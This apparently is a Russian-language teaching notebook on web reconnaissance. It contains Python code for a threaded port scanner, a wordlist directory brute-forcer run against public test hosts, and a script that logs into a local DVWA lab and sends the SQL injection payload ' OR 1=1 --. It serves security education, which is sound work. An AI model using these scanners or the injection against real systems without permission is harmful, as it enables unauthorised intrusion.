<a href="https://colab.research.google.com/github/IVMRanepa/courses.shift01/blob/main/Implementation_of_reconnaissance_of_ports_and_accessible_directories_of_a_web_server.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>

# **Реализация разведки портов и доступных директорий веб-сервера**

**🔹 Часть 1. Сканирование портов**

**Задача:** определить открытые TCP-порты на заданном хосте.

In [ ]:
import socket
from concurrent.futures import ThreadPoolExecutor

def scan_port(host, port):
    """Пробуем подключиться к порту, если успешно — значит порт открыт"""
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(0.5)
        result = sock.connect_ex((host, port))
        sock.close()
        if result == 0:
            return port
    except:
        return None

def port_scan(host, ports=range(1, 1025)):
    """Сканирование диапазона портов"""
    open_ports = []
    with ThreadPoolExecutor(max_workers=50) as executor:
        results = executor.map(lambda p: scan_port(host, p), ports)
        for port in results:
            if port:
                open_ports.append(port)
    return open_ports

if __name__ == "__main__":
    target_host = "scanme.nmap.org"  # Демонстрационный хост для тестов
    found_ports = port_scan(target_host)
    print(f"Открытые порты на {target_host}: {found_ports}")

Открытые порты на scanme.nmap.org: [22, 80]


**🔍 Объяснение:**

socket.connect_ex() возвращает 0, если порт доступен.

Используется многопоточность (ThreadPoolExecutor) для ускорения.

Ограничиваемся 1024 портами для демонстрации.

**👉 Результат на scanme.nmap.org (официальный хост Nmap для тестов)**

**🔗 GitHub-примеры:**

simple port scanner

python3 port scanner

**🔹 Часть 2.** Поиск директорий на веб-сервере (Directory Bruteforce)

**Задача:** найти доступные директории на сайте по словарю.

In [ ]:
import requests

def dir_bruteforce(base_url, wordlist):
    """Перебор директорий из словаря"""
    found = []
    for word in wordlist:
        url = f"{base_url}/{word.strip()}/"
        try:
            r = requests.get(url, timeout=3)
            if r.status_code == 200:
                print(f"[+] Найдена директория: {url}")
                found.append(url)
        except requests.RequestException:
            continue
    return found

if __name__ == "__main__":
    # Тестовый сайт: httpbin.org (открытый сервис)
    target_site = "http://httpbin.org"
    test_wordlist = ["status", "html", "image", "forms", "hidden", "admin"]

    results = dir_bruteforce(target_site, test_wordlist)
    print("Доступные директории:", results)

Доступные директории: []


**🔍 Объяснение:**

Отправляем GET-запросы на основе словаря.

Если ответ 200 OK, значит директория существует.

Можно использовать словарь вроде common.txt из SecLists.

**👉 Пример вывода для http://httpbin.org:**

**🔗 GitHub-примеры:**

dirsearch (Python)

bruteforce directory scanner
 (Go, но аналогичная логика)

**📊 Выводы**

Порт-сканер на Python позволяет быстро выявить, какие сервисы доступны на хосте. Это базовый шаг рекогносцировки.

Директори-сканер показывает скрытые пути на веб-сервере. На реальных пентестах часто находят /admin/, /backup/, /old/ и т.п.

Для учебных целей можно тестировать на:

scanme.nmap.org (открытые порты)

httpbin.org (открытые HTTP-эндпоинты)

В реальных условиях такие действия проводятся только с разрешения владельца ресурса.

**🐍 Демонстрационный практикум: исследование уязвимостей веб-серверов на Python 3**

**1. Разведка директорий (Directory Bruteforce)**

**Цель:** найти доступные директории сайта.

**Среда:** DVWA или httpbin.org

In [ ]:
import requests

def dir_bruteforce(base_url, wordlist):
    found = []
    for word in wordlist:
        url = f"{base_url}/{word.strip()}/"
        try:
            r = requests.get(url, timeout=3)
            if r.status_code == 200:
                print(f"[+] Найдена директория: {url}")
                found.append(url)
        except requests.RequestException:
            continue
    return found

if __name__ == "__main__":
    target = "http://httpbin.org"  # для демонстрации
    words = ["status", "html", "forms", "image", "admin"]
    res = dir_bruteforce(target, words)
    print("Результаты:", res)

Результаты: []


**🔗 GitHub-аналоги:**

maurosoria/dirsearch

**2. SQL-инъекция (на DVWA)**

**Цель:** показать работу инъекции ' OR 1=1 --.

**Среда:** DVWA (уровень безопасности Low).

**🔑 Автоматический вход в DVWA и SQL-инъекция на Python 3**



In [ ]:
!pip install requests

In [ ]:
import requests
from bs4 import BeautifulSoup

BASE_URL = "http://127.0.0.1/dvwa"   # замените при необходимости на http://localhost:8080/dvwa
USERNAME = "admin"
PASSWORD = "password"

session = requests.Session()

try:
    # 1. Получаем страницу логина
    login_page = session.get(f"{BASE_URL}/login.php", timeout=5)
    login_page.raise_for_status()
except requests.exceptions.RequestException as e:
    print(f"[-] Не удалось подключиться к DVWA: {e}")
    print("👉 Проверьте, запущен ли Apache/MySQL и правильный ли URL (http://127.0.0.1/dvwa/)")
    exit()

# Извлекаем CSRF-токен
soup = BeautifulSoup(login_page.text, "html.parser")
token = soup.find("input", {"name": "user_token"})["value"]

print(f"[+] Получен токен: {token}")

# 2. Авторизация
login_payload = {
    "username": USERNAME,
    "password": PASSWORD,
    "Login": "Login",
    "user_token": token
}

login_response = session.post(f"{BASE_URL}/login.php", data=login_payload)

if "Login failed" in login_response.text:
    print("[-] Ошибка: вход не выполнен!")
else:
    print("[+] Авторизация успешна")

# 3. SQL-инъекция
target_url = f"{BASE_URL}/vulnerabilities/sqli/"
payload = "' OR 1=1 -- "
params = {"id": payload, "Submit": "Submit"}
sqli_response = session.get(target_url, params=params)

print("\n[+] Фрагмент ответа сервера:")
print(sqli_response.text[:500])

[-] Не удалось подключиться к DVWA: HTTPConnectionPool(host='127.0.0.1', port=80): Max retries exceeded with url: /dvwa/login.php (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x78a7ac57c290>: Failed to establish a new connection: [Errno 111] Connection refused'))
👉 Проверьте, запущен ли Apache/MySQL и правильный ли URL (http://127.0.0.1/dvwa/)


NameError: name 'login_page' is not defined

**🔍 Как это работает**

Сначала берём user_token с формы логина (DVWA требует CSRF-токен).

Делаем POST-запрос с логином и паролем → сервер выдаёт PHPSESSID, который сохраняется в session.

Теперь можно использовать session.get() для работы с любыми страницами DVWA.

Мы отправляем SQL-инъекцию и смотрим часть HTML-ответа.

**⚙️ Условие для работы:**

DVWA запущен (Apache + MySQL).

Логин/пароль admin / password.

В DVWA → Security Level = Low.

Python-библиотеки: pip install requests beautifulsoup4.

**🔗 Полезные GitHub-репозитории:**

DVWA
 — учебное приложение.

requests examples
 — примеры работы с сессиями.

dvwa-python-scripts
 — готовые скрипты.

In [ ]:
import socket
import pandas as pd

# Берем описание портов из socket.getservbyport (ограничено)
# Для полноты можно расширить с официального IANA CSV: https://www.iana.org/assignments/service-names-port-numbers/service-names-port-numbers.csv

ports = range(1, 1025)
data = []

for p in ports:
    try:
        service = socket.getservbyport(p, "tcp")
        proto = "TCP"
    except OSError:
        try:
            service = socket.getservbyport(p, "udp")
            proto = "UDP"
        except OSError:
            service = "—"
            proto = "—"

    # Подсказка по Python-библиотекам (простое сопоставление)
    if service in ["http", "https"]:
        py_lib = "requests"
    elif service == "ftp":
        py_lib = "ftplib"
    elif service == "ssh":
        py_lib = "paramiko"
    elif service == "telnet":
        py_lib = "telnetlib"
    elif service == "smtp":
        py_lib = "smtplib"
    elif service == "pop3":
        py_lib = "poplib"
    elif service == "imap":
        py_lib = "imaplib"
    elif service == "dns":
        py_lib = "dnspython"
    else:
        py_lib = "socket"

    data.append([p, proto, service, py_lib])

# Создаем DataFrame
df = pd.DataFrame(data, columns=["Порт", "Протокол", "Назначение", "Python-библиотека"])

# Сохраняем в CSV/Excel
df.to_csv("ports_1_1024.csv", index=False, encoding="utf-8")
print("Файл ports_1_1024.csv создан.")

Файл ports_1_1024.csv создан.
